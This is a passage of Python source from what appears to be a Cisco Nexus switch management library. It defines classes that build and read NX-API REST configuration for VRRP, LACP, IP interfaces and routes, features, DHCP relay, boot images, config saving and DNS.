raise TypeError('SVI instance expected')
self._children.append(svi)
def add_port_channel(self, pc=None):
"""Form list of PortChannel"""
if not isinstance(pc, PortChannel):
raise TypeError('PortChannel instance expected')
self._children.append(pc)
def get_url(self, fmt='json'):
return '/api/node/mo/sys/intf.json'
def get_json(self):
return super(ConfigInterfaces, self).get_json(self.object,
attributes={})
class VrrpID(object):
"""
This class defines VRRP ID
"""
def __init__(self, vrrp_id=None, secondary_ip=None, session=None,
parent=None):
if not vrrp_id:
raise TypeError('vrrp_id is not provided')
#VRRP ID interface object
self.object = 'vrrpId'
self.vrrp_id = vrrp_id
self.admin_st = None
self.priority = None
self._primary_ip = None
self.interface = None
#VRRP Secondary object
self.child_object = 'vrrpSecondary'
self._secondary_ip = secondary_ip
self._session= session
self._parent = parent
def set_admin_st(self, admin_st=None):
self.admin_st = admin_st
def get_admin_st(self):
"""
:returns: admin state object
"""
return self.admin_st
def set_priority(self, priority=None):
self.priority = priority
def get_priority(self):
"""
:returns: priority object
"""
return self.priority
def set_primary(self, primary_ip=None):
self._primary_ip = primary_ip
def get_primary(self):
"""
:returns: primary ip object
"""
return self._primary_ip
def set_secondary(self, secondary_ip=None):
self._secondary_ip = secondary_ip
def get_secondary(self):
"""
:returns: secondary ip object
"""
return self._secondary_ip
def set_interface(self, interface):
self.interface = interface
def get_interface(self):
return self.interface
def _get_attributes(self):
att = {}
if self.vrrp_id:
att['id'] = self.vrrp_id
if self.admin_st:
att['adminSt'] = self.admin_st
if self.priority:
att['priCfg'] = self.priority
if self._primary_ip:
att['primary'] = self._primary_ip
return att
def _get_child_attributes(self):
child = []
if self._secondary_ip:
child.append({self.child_object:
{"attributes":
{'secondary': self._secondary_ip}}})
return child
def get_json(self):
return {self.object : { "attributes" : self._get_attributes(),
"children" : self._get_child_attributes()}}
class Vrrp(BaseNXObject):
"""
This defines the VRRP Interface
"""
def __init__(self, interface=None, session=None, parent=None,
vrrp_id=None):
super(Vrrp, self).__init__(name="vrrp_interface")
if not interface:
raise TypeError('interface is not provided')
# Base VRRP interface object
self.object = 'vrrpInterface'
self.interface = interface
self.admin_st = None
self.descr = None
self._session = session
self._parent = parent
# id ('1') passed here does not make any impact
self.vrrp_id = VrrpID('1', session=session, parent=self)
self.vrrp_ids = []
def set_admin_st(self, admin_st=None):
self.admin_st = admin_st
def get_admin_st(self):
"""
:returns: admin state object
"""
return self.admin_st
def set_descr(self, descr=None):
self.descr = descr
def get_descr(self):
"""
:returns: description object
"""
return self.descr
def add_vrrp_id(self, vrrp_id=None):
if isinstance(vrrp_id, VrrpID):
self._children.append(vrrp_id)
self.vrrp_ids.append(vrrp_id)
def _get_attributes(self):
att = {}
if self.interface.if_name:
att['id'] = self.interface.if_name
if self.admin_st:
att['adminSt'] = self.admin_st
if self.descr:
att['descr'] = self.descr
return att
def get_json(self):
"""
:returns: json response object
"""
return super(Vrrp, self).get_json(obj_class=self.object,
attributes=self._get_attributes())
def get_url(self, fmt='json'):
"""
:returns: url object
"""
return '/api/node/mo/sys/vrrp/inst.' + fmt
def get_delete_url(self):
"""
:return: URL do delete for specific interface
"""
return '/api/node/mo/sys/vrrp/inst/if-[%s].xml' % (self.interface.if_name)
@classmethod
def get(self, session=None, interface_str=None):
"""
:param session: Session object to communicate with Switch
:return Vrrp object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
ret_data = []
object = 'vrrpInterface'
if interface_str:
query_url = '/api/node/mo/sys/vrrp/inst/if-['+interface_str+'].json?rsp-subtree=full'
resp = session.get(query_url).json()['imdata']
else:
query_url = '/api/node/mo/sys/vrrp/inst.json?rsp-subtree=full'
data = session.get(query_url).json()['imdata'][0]
resp = data['vrrpInst']['children']
for ret in resp:
interface =ret[object]['attributes']['id']
admin_st = ret[object]['attributes']['adminSt']
descr = ret[object]['attributes']['descr']
vrrp = Vrrp(interface=interface)
if ret[object].get('children'):
for id in ret[object].get('children'):
vrrp_id = id['vrrpId']['attributes']['id']
admin_st = id['vrrpId']['attributes']['adminSt']
priority = id['vrrpId']['attributes']['priCfg']
primary_ip = id['vrrpId']['attributes']['primary']
vrrp_id = VrrpID(vrrp_id=vrrp_id)
vrrp_id.set_admin_st(admin_st)
vrrp_id.set_priority(priority)
vrrp_id.set_primary(primary_ip)
vrrp_id.set_secondary('-')
if id['vrrpId'].get('children'):
for sec in id['vrrpId']['children']:
sec_ip = sec['vrrpSecondary']['attributes']['secondary']
vrrp_id.set_secondary(sec_ip)
vrrp.add_vrrp_id(vrrp_id)
vrrp.set_admin_st(admin_st)
vrrp.set_descr(descr)
ret_data.append(vrrp)
return ret_data
class ConfigVrrps(BaseNXObject):
"""
This is the base class to configure multiple VRRP Interface classes
"""
def __init__(self, session=None):
super(ConfigVrrps, self).__init__(name='')
self._session = session
self.object = 'vrrpInst'
# id ('1') passed here does not make any impact
self.vrrp_id = VrrpID('1', session=session, parent=self)
# interface ('1') passed here does not make any impact
self.vrrp = Vrrp('1', session=session, parent=self)
def add_vrrp(self, module):
if not isinstance(module, Vrrp):
raise TypeError('ConfigVrrps instance expected')
self._children.append(module)
def get_url(self, fmt='json'):
"""
:returns: url object
"""
return '/api/node/mo/sys/vrrp/inst.' + fmt
def get_json(self):
"""
:returns: json response object
"""
return super(ConfigVrrps, self).get_json(self.object)
@classmethod
def get(cls, session=None):
"""
:param session: Session object to communicate with Switch
:return ConfigVrrps object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
return ConfigVrrps(session)
class Lacp(BaseNXObject):
"""
This class defines lacp configuration
"""
def __init__(self, rate=None, interface=None, session=None,
parent=None):
super(Lacp, self).__init__(name='')
self._session= session
self._parent = parent
self.rate = rate
self.interface = interface
self.object = 'lacpIf'
@classmethod
def get(self, session=None, interface=None):
"""
:param session: Session object to communicate with Switch
:return Lacp object
"""
if interface:
query_url = ('/api/node/mo/sys/lacp/inst/if-['+interface+'].'
'json?query-target=self')
else:
query_url = ('/api/node/mo/sys/lacp/inst.json?query-'
'target=children')
ret_data = []
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
resp = session.get(query_url).json()['imdata']
for ret in resp:
rate = ret['lacpIf']['attributes']['txRate']
interface = ret['lacpIf']['attributes']['id']
lacp = Lacp(rate=rate, interface=interface)
ret_data.append(lacp)
return ret_data
def _get_attributes(self):
att = {}
att['txRate'] = self.rate
att['id'] = self.interface.if_name
return att
def get_url(self):
return '/api/node/mo/sys/lacp/inst.json?query-target=children'
def get_json(self):
return super(Lacp, self).get_json(self.object,
attributes=self._get_attributes())
class IPInterface(BaseNXObject):
"""
This class defines IP (v4/v6) of an interface.
"""
def __init__(self, if_name, session=None, parent=None):
"""
:param if_name: String representing interface i.e. eth1/2
:param session: Sessoin instance
:param parent: parent class instance
"""
if not isinstance(if_name, str):
raise TypeError('str instance expected')
self._session = session
self.parent = parent
self.interface = if_name
self.obj_name = 'ip%sIf' % (parent.version)
self._addresses = []
self.if_name = if_name
self.admin_st = None
self.link_local_addr = None
if parent.version == 'v4':
self.acl = None
self.dir_broadcast = None
super(IPInterface, self).__init__(name=self.if_name)
def get_if_name(self):
return self.if_name
def set_admin_st(self, state):
self.admin_st = state
def get_admin_st(self):
return self.admin_st
def get_descr(self):
return self.descr
def set_descr(self, desc):
self.descr = desc
def add_address(self, addr):
self._addresses.append(addr)
def get_address(self):
return self._addresses
def _set_dir_broadcast(self, status):
self.dir_broadcast = status
def _set_acl(self, acl_name):
self.acl = acl_name
def _get_attributes(self):
att = {}
if self.admin_st:
att['adminSt'] = self.admin_st
if self.descr:
att['descr'] = self.descr
att['id'] = self.if_name
if self.parent.version == 'v4' and self.acl and self.dir_broadcast:
att['acl'] = self.acl
att['directedBroadcast'] = self.dir_broadcast
return att
def _get_json(self, class_obj, att=None):
if not att:
att = {}
return {class_obj : {'attributes' : att}}
def set_link_local_addr(self, addr):
self.link_local_addr = addr
def get_json(self):
resp = super(IPInterface,
self).get_json(self.obj_name,
attributes=self._get_attributes())
addrs = []
for addr in self._addresses:
att = {'addr': addr}
addrs.append(self._get_json('ip%sAddr' % (self.parent.version),
att))
if self.link_local_addr:
att = {'addr': self.link_local_addr}
addrs.append(self._get_json('ip%sLLaddr' % (self.parent.version),
att))
resp[self.obj_name]['children'] = addrs
return resp
def get_url(self, fmt='json'):
return ('/api/node/mo/sys/ip%s/inst/dom-default/if-[%s].%s'
% (self.parent.version, self.interface.if_name, fmt))
def get(self, session=None):
"""
This method is used form get() method of IPV6 class
:param sessoin: Session instance
"""
if not session:
session = self._session
query_url = ('/api/node/mo/sys/ip%s/inst/dom-default/if-[%s].json'
'?query-target=children' % (self.parent.version,
self.if_name))
resp = session.get(query_url).json()['imdata']
ipaddr = 'ip%sAddr' % (self.parent.version)
ipladdr = 'ip%sLLaddr' % (self.parent.version)
for addr in resp:
if addr.get(ipaddr):
address = str(addr[ipaddr]['attributes']['addr'])
self.add_address(address)
if addr.get(ipladdr):
self.link_local_addr = str(addr[ipladdr]['attributes']
['addr'])
self.add_address(self.link_local_addr)
class IPNextHop(object):
"""This class defines IP(v4/v6) nexthop"""
def __init__(self, addr, interface, vrf, track_id, tag, parent):
self.addr = addr
self.i_face = interface
self.vrf = vrf
self.track_id = track_id
self.tag = tag
self.object = 'ip%sNexthop' % (parent.version)
def _get_attributes(self):
att = {}
att['nhAddr'] = self.addr
if self.i_face:
att['nhIf'] = self.i_face
if self.vrf:
att['nhVrf'] = self.vrf
if self.track_id:
att['object'] = self.track_id
if self.tag:
att['tag'] = self.tag
return att
def get_json(self):
return {self.object : { 'attributes': self._get_attributes()}}
class IPRoute(BaseNXObject):
"""
This class defines Ip (v4/v6) Route
"""
def __init__(self, prefix, version='v4', name='', parent=None, session=None):
self._session = session
self._parent_cls = parent
if version.lower() not in ['v4', 'v6']:
raise TypeError('Ip version not supported')
self.version = version
if not IP.is_valid_ip(prefix.split('/')[0], self.version):
raise TypeError('Invalid prefix')
super(IPRoute, self).__init__(name=name, parent=parent)
self.prefix = prefix
self.object = 'ip%sRoute' % (self.version)
self.next_hops = []
def get_delete_url(self, domain='default'):
"""
This method has to be called after adding IPRoute instance in IP class
:param fmt: String can be json or xml
:return url: String url to delete the ip/ipv6 route
"""
return ('/api/node/mo/sys/ipv4/inst/dom-%s/rt-[%s].json' % (domain,
self.prefix))
def get_json(self):
return super(IPRoute, self).get_json(self.object,
attributes=self._get_attributes())
def _get_attributes(self):
att = {}
att['prefix'] = self.prefix
return att
def add_next_hop(self, addr, interface=None, vrf=None, track_id=None,
tag=None):
if not IP.is_valid_ip(addr, self.version):
raise TypeError('Invalid prefix for IP' + self.version)
if not isinstance(interface, (Interface, PortChannel)):
raise TypeError('Interface or PortChannel instance expected')
if not vrf:
vrf = 'default'
next_hop = IPNextHop(addr, interface.if_name, vrf, track_id, tag, self)
self._children.append(next_hop)
self.next_hops.append(interface)
def get(self, session=None):
""""
Get all the nexthop details from the switch and form a list of
nexthops and store it in self.next_hops list
:param session: Session object to communicate with Switch
:return None
"""
if not isinstance(session, Session):
session = self._session
query_url = '/api/node/mo/sys/ip%s/inst/dom-%s/rt-[%s].json?query-target=children' %\
(self.version, self._parent_cls.domain, self.prefix)
resp = session.get(query_url).json()['imdata']
ipnexthop = 'ip%sNexthop' % (self._parent.version)
for n_hop in resp:
if n_hop.get(ipnexthop):
addr = n_hop[ipnexthop]['attributes']['nhAddr']
i_face = n_hop[ipnexthop]['attributes']['nhIf']
vrf = n_hop[ipnexthop]['attributes']['nhVrf']
track_id = n_hop[ipnexthop]['attributes']['object']
tag = n_hop[ipnexthop]['attributes']['tag']
next_hop = IPNextHop(addr, i_face, vrf, track_id, tag, self)
self.next_hops.append(next_hop)
class IP(BaseNXObject):
"""
This class defines IP (both v4 and v6)
"""
def __init__(self, version='v4', domain='default', session=None, parent=None):
"""
:param version: String represent ip version
:param dom_name: String represents domain name
:param session: Session instance used for communicating with switch
:param parent: parent class of this class
"""
self._session = session
self._parent = parent
if version.lower() not in ['v4', 'v6']:
raise TypeError('IP version is not supported')
self.version = version.lower()
super(IP, self).__init__(name=domain)
self.i_faces = []
self.version = version.lower()
self.cls_object = 'ip%sDom' % (self.version)
self.domain = domain
self.interfaces = []
self.routes = []
def get_url(self, fmt='json'):
return '/api/node/mo/sys/ip%s/inst/dom-%s.%s' % (self.version,
self.domain, fmt)
def get_delete_url(self, i_face, fmt='json'):
return '/api/node/mo/sys/ip%s/inst/dom-%s/if-[%s].%s' % (self.version,
self.domain, i_face, fmt)
def _get_attributes(self):
att = {}
att['name'] = self.domain
return att
@classmethod
def is_valid_ip(cls, address, version):
try:
if version == 'v6':
socket.inet_pton(socket.AF_INET6, address)
elif version == 'v4':
socket.inet_pton(socket.AF_INET, address)
except socket.error: # not a valid address
return False
return True
def enable_directed_broadcast(self, interface, acl=""):
"""
This method enables the ip directed broadcast on the interface
:param interface: An Interface instance
:param acl: String representing acl name
:return None
"""
if self.version != 'v4':
raise TypeError("Directed broadcast is not supported in IPv6")
if not isinstance(interface, (Interface, PortChannel)):
raise TypeError('Interface or PortChannel instance expected')
if interface.if_name in self.i_faces:
for ip_int in self._children:
ip_int._set_dir_broadcast('enabled')
ip_int._set_acl(acl)
else:
ip_int = IPInterface(interface.if_name, parent=self)
ip_int._set_dir_broadcast('enabled')
ip_int._set_acl(acl)
self._children.append(ip_int)
self.i_faces.append(interface.if_name)
def disable_directed_broadcast(self, interface):
"""
Disable ip directed broadcast
:param interface: Interface instance
:return None
"""
if self.version != 'v4':
raise TypeError("Directed broadcast is not supported in IPv6")
if not isinstance(interface, (Interface, PortChannel)):
raise TypeError('Interface or PortChannel instance expected')
if interface.if_name in self.i_faces:
for ip_int in self._children:
ip_int._set_dir_broadcast('disabled')
def add_interface_address(self, interface, addr, link_local=None):
"""
:param interface: Interface instance
:param addr: String representing IP address
:param link_local: String representing link local address
(only for ipv6)
"""
if self.version == 'v4' and link_local:
raise TypeError('Link local is not applicable for ipv4')
if not isinstance(interface, (Interface, PortChannel, SVI)):
raise TypeError('Interface or PortChannel instance expected')
if not IP.is_valid_ip(addr.split('/')[0], self.version):
raise TypeError('Invalid IP%s address' % (self.version))
if link_local and not IP.is_valid_ip(link_local, self.version):
raise TypeError('Invalid link local')
if interface.if_name in self.i_faces:
for ip_int in self._children:
if ip_int.if_name == interface.if_name:
ip_int.add_address(addr)
if link_local:
ip_int.set_link_local_addr(link_local)
else:
ip_int = IPInterface(interface.if_name, parent=self)
if link_local:
ip_int.set_link_local_addr(link_local)
ip_int.add_address(addr)
self._children.append(ip_int)
self.i_faces.append(interface.if_name)
def add_route(self, route):
"""
Add route capability to the configuration
:param route: IPRoute instance
:return None
"""
if not isinstance(route, IPRoute):
raise TypeError('IPRoute instance expected')
if route.version != self.version:
raise TypeError('IP Version mismatch')
self._children.append(route)
self.routes.append(route)
def get_json(self):
return super(IP, self).get_json(self.cls_object,
attributes=self._get_attributes())
@classmethod
def get(cls, session, version='v4', interface=None, domain=None):
"""
Get IP details (interface and route)
:param session: Session instance to commnunicate with switch
:param version: This method works based on version
:param interface: String represents interface i.e. ethx/y
:param domain: String representing domain name
:return IP object after storing interface and route details
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
if version not in ['v4', 'v6']:
raise TypeError('IP version not supported')
version = version.lower()
if not domain:
domain = 'default'
if interface:
if 'eth' not in interface:
raise TypeError('Not a valid interface')
query_url = ('/api/node/mo/sys/ip%s/inst/dom-%s/if-[%s].json'
% (version, domain, interface))
else:
query_url = ('/api/node/mo/sys/ip%s/inst/dom-%s.json?'
'query-target=children' % (version, domain))
resp = session.get(query_url).json()['imdata']
ip = IP(version, domain)
ip_if = 'ip%sIf' % (version)
ip_route = 'ip%sRoute' % (version)
for ifs in resp:
if ifs.get(ip_if):
attr = ifs[ip_if]['attributes']
ret_int = IPInterface(str(attr['id']), session=session, parent=ip)
if version == 'v4':
ret_int._set_acl(str(attr['acl']))
ret_int._set_dir_broadcast(str(attr['directedBroadcast']))
ret_int.set_admin_st(str(attr['adminSt']))
ret_int.set_descr(str(attr['descr']))
ret_int.get()
ip.interfaces.append(ret_int)
if ifs.get(ip_route):
attr = ifs[ip_route]['attributes']
prefix = str(attr['prefix'])
route = IPRoute(prefix, version=version, parent=ip,
session=session)
route.get()
ip.routes.append(route)
return ip
class FeatureAttributes(object):
"""
This class defines the attributes specific feature
"""
def __init__(self, feature=None, session=None, parent=None):
self._session= session
self._parent = parent
self.admin_st = None
self.instance = None
if feature:
self.name = feature.lower()[2:]
self.object = 'fm' + feature.title().replace('-','')
def set_admin_st(self, admin_st):
self.admin_st = admin_st
def get_admin_st(self):
return self.admin_st
def set_instance(self, instance):
self.instance = instance
def get_instance(self):
return self.instance
def _get_attributes(self):
att = {}
if self.admin_st:
att['adminSt'] = self.admin_st
return att
def get_json(self):
return {self.object : { "attributes" : self._get_attributes()}}
class Feature(BaseNXObject):
"""
This defines the feature class
"""
def __init__(self, session=None, parent=None):
super(Feature, self).__init__(name="feature")
self._session = session
self._parent = parent
# Base feature object
self.object = 'fmEntity'
def enable(self, feature):
feature_obj = FeatureAttributes(feature)
feature_obj.set_admin_st('enabled')
self._children.append(feature_obj)
def disable(self, feature):
feature_obj = FeatureAttributes(feature)
feature_obj.set_admin_st('disabled')
self._children.append(feature_obj)
def get_json(self):
return super(Feature, self).get_json(self.object)
def get_url(self, fmt='json'):
return '/api/mo/sys/fm.' + fmt
def get(self, session=None):
"""
:param session: Session object to communicate with Switch
:return List of Feature objects
"""
if not session:
session = self._session
query_url = '/api/mo/sys/fm.json?rsp-subtree=full'
ret_data = []
resp = session.get(query_url).json()['imdata']
for ret in resp:
children = ret[self.object]['children']
for child in children:
for key in child:
admin_st = child[key]['attributes']['adminSt']
instance = child[key]['attributes']['maxInstance']
feature = FeatureAttributes(key)
feature.set_admin_st(admin_st)
feature.set_instance(instance)
ret_data.append(feature)
return ret_data
class DhcpRelay(object):
"""
This defines the DHCPRelay
"""
def __init__(self, interface=None, session=None, parent=None):
# DhcpRelay object
self.object = 'dhcpRelayIf'
self.interface = interface
#DhcpRelayAddr object
self.child_object = 'dhcpRelayAddr'
self._session= session
self._parent = parent
self.relay_address = []
self.vrf_name = []
def add_relay_address(self, relay, vrf='!unspecified'):
if not relay:
raise TypeError('relay ip address not specified')
self.relay_address.append(relay)
self.vrf_name.append(vrf)
def _get_attributes(self):
att = {}
if self.interface:
att['id'] = self.interface
return att
def _get_child_attributes(self):
child = []
for (address, vrf) in zip(self.relay_address, self.vrf_name):
att = {self.child_object: {"attributes":
{'address': address,
'vrf': vrf}}}
child.append(att)
return child
def get_json(self):
return {self.object : { "attributes" : self._get_attributes(),
"children" : self._get_child_attributes()}}
def get_delete_url(self, interface, fmt='json'):
return '/api/node/mo/sys/dhcp/inst/relayif-[%s].%s' % (interface, fmt)
class Dhcp(BaseNXObject):
"""
This defines the DHCP
"""
def __init__(self, session=None, parent=None):
super(Dhcp, self).__init__(name="dhcp")
# Base Dhcp object
self.object = 'dhcpInst'
self.v4relay_st = None
self.v6relay_st = None
self._session = session
self._parent = parent
self.dhcp_relays = []
def set_v4relay_st(self, v4relay_st=None):
self.v4relay_st = v4relay_st
def get_v4relay_st(self):
return self.v4relay_st
def set_v6relay_st(self, v6relay_st=None):
self.v6relay_st = v6relay_st
def get_v6relay_st(self):
return self.v6relay_st
def _get_attributes(self):
att = {}
if self.v4relay_st:
att['v4RelayEnabled'] = self.v4relay_st
if self.v6relay_st:
att['v6RelayEnabled'] = self.v6relay_st
return att
def add_relay(self, relay=None):
if isinstance(relay, DhcpRelay):
self._children.append(relay)
self.dhcp_relays.append(relay)
def get_json(self):
"""
:returns: json response object
"""
return super(Dhcp, self).get_json(obj_class=self.object,
attributes=self._get_attributes())
def get_url(self):
"""
:returns: url object
"""
return '/api/node/mo/sys/dhcp/inst.json'
@classmethod
def get(self, session=None, version=None):
"""
:param session: Session object to communicate with Switch
:return List containing DHCP object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
ret_data = []
object = 'dhcpInst'
query_url = '/api/node/mo/sys/dhcp/inst.json?rsp-subtree=full'
resp = session.get(query_url).json()['imdata']
dhcp = Dhcp()
for ret in resp:
v4relay_st =ret[object]['attributes']['v4RelayEnabled']
dhcp.set_v4relay_st(v4relay_st)
v6relay_st = ret[object]['attributes']['v6RelayEnabled']
dhcp.set_v6relay_st(v6relay_st)
if ret[object].get('children'):
for child in ret[object]['children']:
child_obj = child['dhcpRelayIf']
interface = child_obj['attributes']['id']
dhcp_relay = DhcpRelay(interface=interface)
for g_child in child_obj['children']:
if child_obj.get('children'):
address = str(g_child['dhcpRelayAddr']
['attributes']['address'])
vrf = str(g_child['dhcpRelayAddr']['attributes']
['vrf'])
if vrf == '!unspecified':
vrf = ''
dhcp_relay.add_relay_address(address, vrf)
if not version:
dhcp.add_relay(dhcp_relay)
if version=='ip' and '.' in address:
dhcp.add_relay(dhcp_relay)
elif version=='ipv6' and ':' in address:
dhcp.add_relay(dhcp_relay)
ret_data.append(dhcp)
return ret_data
class BootNxos(BaseNXObject):
"""
This class is used to set boot variable
"""
def __init__(self, image, session=None, parent=None):
"""
:param image: String boot image file name
:param session: Session object to communicate with switch
"""
if not isinstance(image, str):
raise TypeError
super(BootNxos, self).__init__(name="")
# Base boot object
self.object = 'bootBoot'
self._session = session
self._parent = parent
# boot image object
self.child_object = 'bootImage'
self.sup1 = image
self.sup2 = image
def _get_children_attributes(self):
child = []
att = {}
if self.sup1:
att['sup1'] = 'bootflash:/' + self.sup1 + '.bin'
att['sup2'] = 'bootflash:/' + self.sup2 + '.bin'
child.append({self.child_object : { "attributes" : att}})
return child
def set_sup2(self, sup2):
self.sup2 = sup2
def get_sup2(self):
return self.sup2
def get_json(self):
return super(BootNxos,
self).get_json(obj_class=self.object,
attributes={},
children=self._get_children_attributes())
def get_url(self):
""" Return boot url """
return '/api/node/mo/sys/boot.json'
@classmethod
def get(self, session):
"""
:param session: Session object to communicate with Switch
:return BootNxos object
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
obj = 'bootBoot'
query_url = '/api/node/mo/sys/boot.json?rsp-subtree=full'
resp = session.get(query_url).json()['imdata']
for ret in resp:
children = ret[obj]['children']
for child in children:
sup1 = str(child['bootImage']['attributes']['sup1'])
sup2 = str(child['bootImage']['attributes']['sup2'])
boot = BootNxos(sup1)
boot.set_sup2(sup2)
return boot
class RunningToStartUp(object):
"""
This class defines coping running to startup config
"""
def __init__(self, session=None, parent=None):
self.obj_name = 'topSystemCopyRSLTask'
self.admin_st = 'start'
self.frequency = 'one-shot'
self.status = None
def _get_att(self):
att = {}
att['adminSt'] = self.admin_st
att['freq'] = self.frequency
return att
def set_status(self, status):
self.status = status
def set_admin_st(self, adminst):
self.admin_st = adminst
def set_frequency(self, freq):
self.frequency = freq
@classmethod
def _get_lsub(cls):
return 'lsubj-[sys]'
def get_url(self):
return ('/api/mo/sys/action/%s.json' %
(RunningToStartUp._get_lsub()))
def get_json(self):
return {self.obj_name: {'attributes': self._get_att()}}
class Copy(BaseNXObject):
"""
This class defines copy command of Nexus switch
"""
def __init__(self):
self.obj_name = 'actionLSubj'
super(Copy, self).__init__(name="")
self.run_to_start = None
def get_url(self):
return '/api/mo/sys/action.json'
def add(self, command):
if isinstance(command, RunningToStartUp):
self._children.append(command)
self.run_to_start = command
else:
raise TypeError('Invalid command class')
def _get_attributes(self):
return {"dn": self._get_dn()}
def _get_dn(self):
return 'sys/action/' + RunningToStartUp._get_lsub()
def get_json(self):
return super(Copy, self).get_json(self.obj_name,
attributes=self._get_attributes())
@classmethod
def get(cls, session):
"""
Get information if copy command performed properly or not.
:session session: Session instance used to communicate with the switch
:return Copy instance
"""
if not isinstance(session, Session):
raise TypeError('An instance of Session class is required')
query_url = '/api/mo/sys/action.json?rsp-subtree=full'
resp = session.get(query_url).json()['imdata']
# status is initially it is unknown
descr = 'unknown'
copy = Copy()
for count in resp:
if count.get('actionLCont'):
act_children = count['actionLCont']['children']
for act_child in act_children:
if act_child.get('actionLSubj'):
children = act_child['actionLSubj']['children']
for child in children:
obj_name = 'topSystemCopyRSRslt'
if child.get(obj_name):
# Description contains copy status (Success)
descr = str(child[obj_name]
['attributes']['descr'])
run = RunningToStartUp(session=session, parent=copy)
run.set_status(descr)
copy.add(run)
return copy
class DnsVrf(BaseNXObject):
"""
This defines the Dns Vrf configuration
"""
def __init__(self, name, session=None, parent=None):
super(DnsVrf, self).__init__(name="")
self._session= session
self._parent = parent
self.name = name
self.object = 'dnsVrf'
self.profile = None
self.providers = []
self.domains = []
self.domain_exts = []
def set_profile(self, profile):
self.profile = profile
def use_in(self, obj=None):
self._children.append(obj)
if isinstance(obj, DnsProvider):
self.providers.append(obj)
elif isinstance(obj, DnsDom):
self.domains.append(obj)
elif isinstance(obj, DnsDomExt):
self.domain_exts.append(obj)
def _get_attributes(self):
att = {}
if self.name:
att['name'] = self.name
return att
def get_json(self):
"""
:returns: json response object
"""
return super(DnsVrf, self).get_json(obj_class=self.object,
attributes=self._get_attributes())
def get_url(self):
""" Return Dns VRF url """
if not self.profile:
return '/api/node/mo/sys/dns/prof-default.json'
else:
return '/api/node/mo/sys/dns/prof-%s.json'% self.profile
class DnsProvider(BaseNXObject):
"""
This defines the Dns Provider configuration
"""
def __init__(self, address, session=None, parent=None):
super(DnsProvider, self).__init__(name="")
self._session= session
self._parent = parent
self.address = address
self.object = 'dnsProvider'
def _get_attributes(self):
att = {}
if self.address:
att['addr'] = self.address
return att
def get_json(self):
"""
:returns: json response object
"""
return super(DnsProvider, self).get_json(obj_class=self.object,
attributes=self._get_attributes())
class DnsDom(BaseNXObject):
"""
This defines the Dns Domain name configuration
"""
def __init__(self, name, session=None, parent=None):
super(DnsDom, self).__init__(name="")
self._session= session
self._parent = parent
self.name = name
self.object = 'dnsDom'
def _get_attributes(self):
att = {}
if self.name:
att['name'] = self.name
return att
def get_json(self):
"""
:returns: json response object
"""
return super(DnsDom, self).get_json(obj_class=self.object,
attributes=self._get_attributes())
class DnsDomExt(BaseNXObject):
"""
This defines the Dns domain list name configuration
"""
def __init__(self, name, session=None, parent=None):
super(DnsDomExt, self).__init__(name="")
self.name = name
self.object = 'dnsDomExt'
def _get_attributes(self):
att = {}
if self.name:
att['name'] = self.name
return att
def get_json(self):
"""
:returns: json response object
"""
return super(DnsDomExt, self).get_json(obj_class=self.object,
attributes=self._get_attributes())
class DnsHost(BaseNXObject):
"""
This defines the Dns host configuration
"""
def __init__(self, name, address, session=None, parent=None):
super(DnsHost, self).__init__(name=name)
self._session= session
self._parent = parent
self.name = name
self.address = address
self.object = 'dnsHost'
self.child_v4 = 'dnsIpv4Host'
self.child_v6 = 'dnsIpv6Host'
def _get_attributes(self):
att = {}
if self.name:
att['name'] = self.name
return att
def _get_children_attributes(self):
child = []
if self.address:
att = {'addr': self.address}
if '.' in self.address:
child.append({self.child_v4 : { "attributes" : att}})
if ':' in self.address:
child.append({self.child_v6 : { "attributes" : att}})
return child
def get_json(self):
"""
:returns: json response object
"""
return super(DnsHost, self).get_json(obj_class=self.object,
attributes=self._get_attributes(),
children=self._get_children_attributes())
class DnsProfile(BaseNXObject):
"""
This defines the Dns profile configuration
"""
def __init__(self, session=None, parent=None):
super(DnsProfile, self).__init__(name="")
self._session= session
self._parent = parent
self.object = "dnsProf"
self.name = "default"
self.providers = []
self.domains = []
self.domain_exts = []
self.hosts = []
self.vrfs = []
def set_prof_name(self, name):
self.name = name
def get_prof_name(self):
return self.name
def add(self, dns_obj=None):
self._children.append(dns_obj)
if isinstance(dns_obj, DnsProvider):
self.providers.append(dns_obj)
elif isinstance(dns_obj, DnsDom):
self.domains.append(dns_obj)
elif isinstance(dns_obj, DnsDomExt):
self.domain_exts.append(dns_obj)
elif isinstance(dns_obj, DnsHost):
self.hosts.append(dns_obj)
elif isinstance(dns_obj, DnsVrf):
self.vrfs.append(dns_obj)
def _get_attributes(self):
att = {}
if self.name:
att['name'] = self.name
return att
def get_json(self):
"""
:returns: json response object
"""
return super(DnsProfile, self).get_json(obj_class=self.object,
attributes=self._get_attributes())
class DNS(BaseNXObject):
"""
This defines the Dns Base Class
"""
def __init__(self, session=None, parent=None):
super(DNS, self).__init__(name="")
self._session= session
self._parent = parent
self.admin_st = None
self.object = "dnsEntity"
self.profiles = []
def set_admin_st(self, admin_st):
self.admin_st = admin_st
def get_admin_st(self):
return self.admin_st
def enable_lookup(self):
self.admin_st = "enabled"
def disable(self, feature):
self.admin_st = "disabled"
def add_profile(self, dns_obj=None):
self._children.append(dns_obj)
self.profiles.append(dns_obj)
def _get_attributes(self):
att = {}
if self.admin_st:
att['adminSt'] = self.admin_st
return att
def get_json(self):
"""
:returns: json response object
"""
return super(DNS, self).get_json(obj_class=self.object,
attributes=self._get_attributes())
def get_url(self):
""" Return Dns url """
return '/api/node/mo/sys/dns.json'
@classmethod
def _get_provider(cls, data, profile=None, vrf=None):
""" Returns the object by attaching provider object """
address = str(data['dnsProvider']['attributes']['addr'])
provider = DnsProvider(address)
if profile:
profile.add(provider)
return profile
if vrf:
vrf.use_in(provider)
return vrf
@classmethod
def _get_domain_ext(cls, data, profile=None, vrf=None):
""" Returns the object by attaching DNS domain_ext object """
name = str(data['dnsDomExt']['attributes']['name'])
dom_ext = DnsDomExt(name)
if profile:
profile.add(dom_ext)
return profile
if vrf:
vrf.use_in(dom_ext)
return vrf
@classmethod
def _get_domain(cls, data, profile=None, vrf=None):
""" Returns the object by attaching DNS domain object """
name = str(data['dnsDom']['attributes']['name'])
dom = DnsDom(name)
if profile:
profile.add(dom)
return profile
if vrf:
vrf.use_in(dom)
return vrf
@classmethod
def get(cls, session):
"""
:param session: Session object to communicate with Switch
